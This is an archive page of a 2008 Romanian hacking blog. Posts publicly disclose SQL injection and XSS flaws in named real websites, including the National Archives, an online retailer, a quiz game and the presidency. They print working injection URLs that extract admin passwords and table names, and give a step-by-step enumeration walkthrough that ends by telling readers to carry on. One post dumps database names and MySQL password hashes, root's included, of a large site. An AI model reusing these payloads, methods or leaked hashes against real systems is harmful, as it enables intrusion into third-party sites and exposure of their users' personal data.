- Hacker Uses XSS and Google Street View Data to Determine Physical Location
- CAnCAn te iubim, CA CA tine nu gasim. Superfete.cancan.ro e de rahat
- Deface (?!?) pe Cotidianul.ro
- Virusi in clipuri video [how to]
- Cyber-Bullying – palma parinteasca a noului mileniu
- Christopher “moot” Poole: The case for anonymity online
- Wtf Avira?
- Some old story about tagged.com
- Pwning cam girls for fun
- Tabloshit
- Yahoo! again - XSS in Uncategorized (357 Visits)
- Yahoo! again - bad settings? in Uncategorized (252 Visits)
- Fanii nostri in Uncategorized (183 Visits)
- Frustrant in Uncategorized (146 Visits)
- La multi ani România, la multi ani românilor in Uncategorized (137 Visits)
- Weblog.ro - Shell via Local File Inclusion in Uncategorized (119 Visits)
- Yahoo! epic fail - permanent xss unleashed in Uncategorized (50 Visits)
- ... in Uncategorized (38 Visits)
- XSS Ownage - hi5 vs. Yahoo! + video in Uncategorized (2 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam/Hi5 (4) in Uncategorized (2 Visits)
- Hackersblog.org is now blog.rstcenter.com in (1781 Visits)
- O mica dar importanta precizare in (1389 Visits)
- Twitter in (821 Visits)
- This is the end in (803 Visits)
- Ce servicii de mail folositi? in (791 Visits)
- Un nou membru in (747 Visits)
- La multi ani România, la multi ani românilor in (737 Visits)
- Inca o pierdere de timp in (690 Visits)
- De reţinut in (648 Visits)
- Azi este ziua userilor hackersblog.org in (625 Visits)
- SMS scam (1) in (583 Visits)
- Hi5.com coders read this in (581 Visits)
- Dezinformare sau proasta informare? in (577 Visits)
- Phishing Raiffeisen cu atasament html in (534 Visits)
- Phishing Bancpost in (502 Visits)
- Si tentativele de phishing pot fi amuzante in (435 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam/mail (2) in (2789 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam/Hi5 (4) in (2706 Visits)
- Despre CSRF, hi5.com, cum sa trisezi la concursuri s.a.m.d. in (1171 Visits)
- [Utilitare] Suna gratis de pe internet sau de pe iPhone in (1146 Visits)
- Ce nu se invata la scoala - (D)DOS (5) in (974 Visits)
- Virusi in clipuri video [how to] in (893 Visits)
- Ce nu se invata la scoala - Tipuri si tehnici spam (1) in (742 Visits)
- Yahoo! redirects - a big issue (with video) in (583 Visits)
- Internet vs. privacy (1) in (485 Visits)
- Ca musca in... in (447 Visits)
- RedTube.com ... The Free Sex Video Community in (13215 Visits)
- usa.kaspersky.com hacked ... full database acces , sql injection in (5197 Visits)
- libertatea.ro vulnerabil la (blind) sql injection in (3008 Visits)
- Pwning cam girls for fun in (2649 Visits)
- Telegraph.co.uk hacked, sql injection in (2628 Visits)
- Facebook hacked - sql injection in (2511 Visits)
- Simpatie.ro, matrimoniale3x.ro, apetisant.ro, deliciu.ro , etc Sql injection in (2484 Visits)
- F-Secure.com - SQL Injection + Cross Site Scripting in (1815 Visits)
- [Hacked]Bitdefender (Portugal) exposes sensitive customer data in (1802 Visits)
- Wtf Avira? in (1763 Visits)
- Christopher "moot" Poole: The case for anonymity online in (1535 Visits)
- Digital Photocopiers Loaded With Secrets in (1475 Visits)
- Hacker Uses XSS and Google Street View Data to Determine Physical Location in (703 Visits)
- Wannabe Hackers [1] - Cum sa hack-uiesti RapidShare-ul in (620 Visits)
- Wannabe Hackers [2] - cum sa faci un virus by sppy_hacker in (611 Visits)
- Hope 2603 – Kevin Mitnick - Life a Computer Hacker – Revealed in (476 Visits)
- PRIVACY IS DEAD - GET OVER IT, Pt 01-34 (Recommended by Hackersblog ) in (410 Visits)
- Oldies but goodies - Freedom Downtime - The Story of Kevin Mitnick in (394 Visits)
- [Video] The History Of Hacking in (382 Visits)
- Email Security - Why You Should Encrypt Your Email - Part One in (377 Visits)
- Deface - tuttoaffari.lastampa.it si citymusiclab.city.corriere.it in (3516 Visits)
- RNS vs. RAI - citizenreport.rai.it hacked. in (3326 Visits)
- Hi5 email finder si sfarsitul a tot ceea ce inseamna privacy in social networking in (3150 Visits)
- Se poate sparge parola de Yahoo? in (2655 Visits)
- Planete-plus-intelligente.lemonde.fr defaced by R.N.S. in (2519 Visits)
- Free SMS time, TrimiteSMS.ro in (2512 Visits)
- Gmail uber hacking in (2368 Visits)
- Cancan.ro spart pentru a doua oara intr-o zi in (2302 Visits)
- Camera de supraveghere a universitatii Alexandru Ioan Cuza din Iasi in (2289 Visits)
- Stiri cu antena3 in (2228 Visits)
Archive for November, 2008
Posted on November 29th, 2008
Un site cu un trafic foarte mare, cu o baza de date imensa vulnerabil la Blind SQL Injection. Drept dovada sunt print screen-uri din care se vede ca inclusiv functia subselect lucreaza.
Baza de date www_realitatea_net cu sute de tabele
REMOVED
Posted on November 29th, 2008
SQL Injection pentru a extrage usere/emailuri/parole:
http://www.pcfarm.ro/prospect.php?id=-1%20UNION%20SELECT%200,(select%20pass%20from%20users%20LIMIT%203,1),2,3,4,5,6,7
Cross site scripting:
http://www.pcfarm.ro/dictionar.php?id=%3Cscript%3Ealert(6)%3C/script%3E
Posted on November 28th, 2008
“Un loc unde poti face noi prietenii, indiferent de ceea ce cauti, casatorie sau simpla prietenie, sex sau distractie” Inregistrati aproape 200.000. Nimic iesit din comun. Problema incepe de la un parametru vulnerabil la sql injection. Iar de aici pana a face sintaxa pentru extragerea datelor (username,email,parola,etc) nu este decat un pas mic.
De ex o parte din tabelele bazei de date:
Iar la capitolul useri cine credeti ca este primu’? Adminul,desigur.
Posted on November 27th, 2008
Un site cu trafic maricel. “Preturi online din Romania.Expertul tau in cumparaturi” –logo-ul siteului. Ce sa zic? Misto expert care, fiind vulnerabil la sql injection tine la vedere toate datele personale a celor inregistrati: nume, prenume, cnp, serie si nr buletin, adresa,numar tel, cat si datele de logare.
Posted on November 27th, 2008
“Arhivele Nationale ale Romaniei, institutie cu o istorie de 177 de ani, aflata in subordinea Ministerului Internelor si Reformei Administrative, are atributii in administrarea si protectia speciala a Fondului Arhivistic National al Romanie”..citez de pe site. Speram totusi ca de acel fond este administrat mai bine si este mai protejat decat propria pagina web a distinsei institutii, care are o grava vulnerabilitate la sql injection. Link catre tabele:
http://www.arhivelenationale.ro/index.php?lan=0&jud=1234999%20union%20all%20select%201,2,3,group_concat(table_name),5%20from%20information_schema.tables/*
Chiar si parola pentru contul de admin al site-ului este extractibil in text clar. Plus este o parola simpla,usor de ghicit, nepermis pentru un site serios.
</a
Posted on November 26th, 2008
Un LFI-ul evident cu un rezultat amuzant in cazul includerii fisierului care se ocupa de include-uri (loader.php):
(in dreapta path disclosure)
In urma unui SQL Injection, specially crafted, prin produse.php… self denial of service, asistam la moartea serverului SQL:
Posted on November 25th, 2008
Monitorul Oficial editeaza publicatiile oficiale a statului roman, publica toate hotaririle guvernului,vinde online carti,etc. Deci teoretic ar trebui sa fie un site sigur. Dar practic nu este. Link catre numele schemelor:
Printre tabele descoperim si cea a userilor unde pe primul loc se afla parola adminului
In poza (din adresa de email) se vede ca administratorul siteului este de la firma ete.ro a carui logo suna astfel: “Suntem o companie care doreste sa satisfaca absolute orice nevoie IT a firmei dvs” –citez de pe site-ul firmei. Misto satisfactie, avand in vedere ca si parolele respectivului site sunt lasate la vedere (la fel vulnerabil lasql injection).
</aPosted on November 24th, 2008
Da…again. Cu putin timp in urma am descoperit parametrul companyid= vulnerabil. Atunci n-am facut public sintaxa pentru extragerea datelor. Adminii au primit mail, si au securizat iesirea. Conquiztador este un joc,ce se joaca in multe tari,pe aceasi platforma. Doar cel din ro avea adaugat parametrul logoclick.php?companyid= . Pentru ce credeti ca era? Pentru a face reclama. Si cui? Desigur,in mare parte,firmelor apartinatoare trustului Pro.
Dar…si zic dar, pentru ca de data asta parametrul descoperit vulnerabil este global,valabil pentru toate platformele tarilor in care se joaca jocul.(O simpla cautare pe google inurl:”forum_topic.php?fid=” va convinge)Deci parametrul vulnerabil este fid= in sintaxa forum_topic.php?fid= .Totusi pentru a putea exploata vulnerabilitatea avem nevoie de niste cunostinte sql, deoarece rezultatele nu sunt afisate simplu, in text clar.
Dar un mic exercitiu poate sa faca oricine. Sa luam adresa:http://www.conquiztador.ro/forum_topic.php?fid=5
si aflam numarul coloanelor: http://www.conquiztador.ro/forum_topic.php?fid=5+order+by+1/* true, adica apare pagina originala. Inlocuim 1 cu 2 si tot asa pana la 5, true… La 6 vom avea http://www.conquiztador.ro/forum_topic.php?fid=5+order+by+6/* eroare, deci avem 5 coloane.
Acum sa aflam versiunea bazei de date
select 1,unhex(hex(@@version)),3,4,5 vom avea drept rezultat: 1, 5.0.32-Debian_7etch3-log, 3, 4, 5
Numele bazelor de date sunt:
[*] cq_ro
[*] information_schema
[*] mysql
[*] mysql_old
[*] test
Pe noi ne intereseaza cq_ro. Tabele acestei baze de date sunt:
aa_unban2
aa_unban3
aa_users_chat_save
aa_users_unban
ad_download
addrbook
adperiods
advert
agecategory
askedgroups
auct_cycle
auct_hist
auct_item
auct_win
badmarking_mcq
badmarking_tq
badquestion
balance_change
balance_users
banner
bannerplace
bannerplace_old
bctrack
bctrack_user
brokenconn
cachecontrol
chatmsg
cities
clientactionlog
clinks
companies
competition
competition_games
compticket
compuser_codes
compusers
connections
costingames
countries
county
cqusers
ctrldata
dbsmlog
dbsmver
dbversion
deletedquestions
division
eventlog
faq
forum_cat
forum_msg
forum_topic
forum_topic_last
game
helppages
inv_head
inv_item
inv_unit
item_dnloads
jepgen
jeprecalc
lanswers
layerpopup
links
linktrace
login_log
loginq
loginq_temp
logins
logo_download
lqj_answers
lqj_question
lqj_targetcity
lqj_useransw
mailhead
mailmsg
mailmsg_del
moderatorlog
moneychange
moneymovecode
moneyticket
monthlystats_temp
msgfilter
news
news_head
newsletter
newslettersend
online
parameters
preloader
preloader_date
preloader_downcount
preloaderconf
qhistory
qrating
question
questioncat
questionclass
questionratinglog
questionrow
reportx
rl_competition
rl_competition_users
rl_day
rl_day_prev
rl_games
rl_jep
rl_knl_day
rl_knl_day_temp
rl_stu_grp
rl_vep
sanyistat
settings
smith_repro
smith_robot
stu_game
stu_usergame
stu_userpoints
themegroup
themes
ticketcodeerror
tipgroup
tiphistory
tipquestion
tipquestionrow
tiprating
tipthemes
tournament_fgames
tournament_qresults
tournament_usergame
tournament_users
tournaments
user_clicks
useragent
useransstat
usergame
usergame_comp
userpoints
userpoints_comp
users
users_addr
users_chat
users_data
users_email
users_extra
users_flaggers
users_forum
users_gold_temp
users_gold_temp2
users_locations
users_names
users_names_deny
users_presence
users_questions
users_questions_action
users_questions_admindesc
users_secureq
ws_basket
ws_cat
ws_deliver
ws_images
ws_itemmove
ws_movetype
ws_orderhead
ws_orderitem
ws_orderstates
ws_product
zipcodes
Mai departe faceti voi.
Posted on November 24th, 2008
Inca un site cu trafic mare, peste 640.000 vizitatori ofera acces liber la baza de date.
Lista bazelor de date este:
[*] %
[*] ambasade
[*] cinema
[*] common
[*] curs_valutar
[*] download
[*] egroupware
[*] fun
[*] infokappa
[*] kappa
[*] mae
[*] mae_en
[*] mae_fr
[*] mozaicul\_presei
[*] mozaicul_presei
[*] muzica_1
[*] muzica_3
[*] mysql
[*] partizanu
[*] phpgroupware
[*] ri
[*] romaniantourism
[*] root
[*] snort
[*] sr
[*] stiri\_dev
[*] stiri_dev
[*] streaming
[*] subiecte2007
[*] test\_%
[*] vpopmail
[*] weather
Parolele de acces pt utilizatorii cei mai importanti:
[*] alina [1]:
password hash: *FD4CC5018C5A28ACAF4A3E62A590788FDD04FED6
[*] ambasade [1]:
password hash: 648f85966b615634
[*] central [1]:
password hash: *E7B08A1ABE658B286956C7DB35B7CC10FCCA777F
[*] curs_from_open [1]:
password hash: *8F77795952D8A6254AA6FC6133029977B3CBBAAD
[*] dev [1]:
password hash: *8F77795952D8A6254AA6FC6133029977B3CBBAAD
[*] dev_stream [1]:
password hash: *86FE3C4B8B8C7BFF97893E627A50BE45C980FB54
[*] didi [1]:
password hash: 648f85966b615634
[*] egroupware [1]:
password hash: *B1461C9C68AFA1129A5F968C343636192A084ADB
[*] infokappa [1]:
password hash: *EBE0F771307F376E8295A708AD6FE5778783CD85
[*] kuser [1]:
password hash: *86FE3C4B8B8C7BFF97893E627A50BE45C980FB54
[*] muzica_1 [1]:
password hash: *10ADCB24624EA3924169B7D798A7B5CA10153E58
[*] nwl_distrib [1]:
password hash: *8F77795952D8A6254AA6FC6133029977B3CBBAAD
[*] pdns [1]:
password hash: 76e1d64f031dae3f
[*] phpgroup [1]:
password hash: *2CE8D572C5BB19215C416366CF0CC8B243213CFC
[*] repl [1]:
password hash: 648f85966b615634
[*] ri [1]:
password hash: *DA7E4065F2C03105BB7195E858337BE663BB99BA
[*] root [1]:
password hash: *10ADCB24624EA3924169B7D798A7B5CA10153E58
[*] snort [1]:
password hash: 466d4b5022e3e3a3
[*] spider_xp [1]:
password hash: *8F77795952D8A6254AA6FC6133029977B3CBBAAD
[*] sr_from_dev [1]:
password hash: *8F77795952D8A6254AA6FC6133029977B3CBBAAD
[*] vpopmail [1]:
password hash: *35DE4874014FE5DD945B1DC23FA751500370D811
[*] weather [1]:
password hash: *8F77795952D8A6254AA6FC6133029977B3CBBAAD
[*] xadmin [1]:
password hash: 648f85966b615634
Posted on November 24th, 2008
Nu doar site-urile ministerelor sunt afectate de vulnerabilitati, ci insasi pagina presedintiei. Sincer, atunci la ce sa ne mai asteptam?
Schema name:
link catre tabele:
Aviz pentru “fanii” lu’ Base’ ….nu abuzati de functia insert